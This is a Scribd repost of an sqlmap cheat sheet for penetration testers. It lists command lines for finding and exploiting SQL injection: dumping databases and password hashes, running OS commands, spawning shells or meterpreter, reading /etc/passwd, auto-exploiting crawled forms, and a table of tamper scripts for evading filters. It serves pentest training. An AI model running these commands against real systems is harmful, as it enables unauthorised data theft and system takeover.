Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
170 views6 pages

Sqlmap Advanced

This document provides information on how to use the SQLmap tool to test for and exploit SQL injection vulnerabilities. It lists common SQLmap commands and parameters for tasks such as retrieving information from the database, dumping database contents, executing operating system commands via SQL injection, and automating the scanning of a website for SQL injection vulnerabilities. The document also provides tips on customizing SQL injection payloads using techniques like prefixing, suffixing, and tampering strings.

Uploaded by

Barik Ghofur
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
170 views6 pages

Sqlmap Advanced

This document provides information on how to use the SQLmap tool to test for and exploit SQL injection vulnerabilities. It lists common SQLmap commands and parameters for tasks such as retrieving information from the database, dumping database contents, executing operating system commands via SQL injection, and automating the scanning of a website for SQL injection vulnerabilities. The document also provides tips on customizing SQL injection payloads using techniques like prefixing, suffixing, and tampering strings.

Uploaded by

Barik Ghofur
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Basic arguments for SQLmap

Generic

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default
"BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the
default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union
char

Retrieve Information

Internal

--current-user #Get current user


--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DB data

--all #Retrieve everything


--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place
From Burp/ZAP capture

Capture the request and create a req.txt file


sqlmap -r req.txt --current-user
GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers and other HTTP Methods

#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'

Indicate string when injection is successful

--string="string_showed_when_TRUE"

Eval

Sqlmap allows the use of -e or --eval to process each payload before sending it with some
python oneliner. This makes very easy and fast to process in custom ways the payload before
sending it. In the following example the flask cookie session is signed by flask with the
known secret before sending it:
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session =
s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --
dump

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Read File

--file-read=/etc/passwd

Crawl a website with SQLmap and auto-exploit


sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --
level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the
default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Second Order Injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3


sqlmap -r 1.txt -dbms MySQL -second-order
"http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Read this post about how to perform simple and complex second order injections with
sqlmap.

Labs to practice
 Learn about sqlmap by using it in the THM room:

TryHackMe | SQLMAP
TryHackMe

Customizing Injection
Set a suffix

python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "

Prefix

python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "

Help finding boolean injection

# The --not-string "string" will help finding a string that does not appear in True responses
(for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Remember that you can create your own tamper in python and it's very simple. You can
find a tamper example in the Second Order Injection page here.
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper Description
Replaces apostrophe character with its UTF-8 full width
apostrophemask.py
counterpart
Tamper Description
Replaces apostrophe character with its illegal double unicode
apostrophenullencode.py
counterpart
Appends encoded NULL byte character at the end of
appendnullbyte.py
payload
base64encode.py Base64 all characters in a given payload
Replaces greater than operator ('>') with 'NOT BETWEEN 0
between.py
AND #'
bluecoat.py Replaces space character after SQL statement with a valid
random blank character.Afterwards replace character = with
LIKE operator
Double url-encodes all characters in a given payload (not
chardoubleencode.py
processing already encoded)
Replaces instances like 'LIMIT M, N' with 'LIMIT N
commalesslimit.py
OFFSET M'
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM
commalessmid.py
B FOR C)'
Replaces instances like 'CONCAT(A, B)' with
concat2concatws.py
'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
Url-encodes all characters in a given payload (not processing
charencode.py
already encoded)
Unicode-url-encodes non-encoded characters in a given
charunicodeencode.py
payload (not processing already encoded). "%u0022"
Unicode-url-encodes non-encoded characters in a given
charunicodeescape.py
payload (not processing already encoded). "\u0022"
Replaces all occurances of operator equal ('=') with operator
equaltolike.py
'LIKE'
escapequotes.py Slash escape quotes (' and ")
Replaces greater than operator ('>') with 'GREATEST'
greatest.py
counterpart
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword
Replaces instances like 'IFNULL(A, B)' with
ifnull2ifisnull.py
'IF(ISNULL(A), B, A)'
modsecurityversioned.py Embraces complete query with versioned comment
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment
multiplespaces.py Adds multiple spaces around SQL keywords
Replaces predefined SQL keywords with representations
nonrecursivereplacement.py
suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.py Adds a percentage sign ('%') infront of each character
Converts all characters in a given payload (not processing
overlongutf8.py
already encoded)
randomcase.py Replaces each keyword character with random case value
randomcomments.py Add random comments to SQL keywords
securesphere.py Appends special crafted string
Appends 'sp_password' to the end of the payload for
sp_password.py
automatic obfuscation from DBMS logs
space2comment.py Replaces space character (' ') with comments
Tamper Description
Replaces space character (' ') with a dash comment ('--')
space2dash.py
followed by a random string and a new line ('\n')
Replaces space character (' ') with a pound character ('#')
space2hash.py
followed by a random string and a new line ('\n')
Replaces space character (' ') with a pound character ('#')
space2morehash.py
followed by a random string and a new line ('\n')
Replaces space character (' ') with a random blank character
space2mssqlblank.py
from a valid set of alternate characters
Replaces space character (' ') with a pound character ('#')
space2mssqlhash.py
followed by a new line ('\n')
Replaces space character (' ') with a random blank character
space2mysqlblank.py
from a valid set of alternate characters
Replaces space character (' ') with a dash comment ('--')
space2mysqldash.py
followed by a new line ('\n')
space2plus.py Replaces space character (' ') with plus ('+')
Replaces space character (' ') with a random blank character
space2randomblank.py
from a valid set of alternate characters
Replaces AND and OR logical operators with their symbolic
symboliclogical.py
counterparts (&& and
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT
Replaces quote character (') with a multi-byte combo %bf
unmagicquotes.py %27 together with generic comment at the end (to make it
work)
Replaces each keyword character with upper case value
uppercase.py
'INSERT'
varnish.py Append a HTTP header 'X-originating-IP'
Encloses each non-function keyword with versioned MySQL
versionedkeywords.py
comment
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment
xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For'

You might also like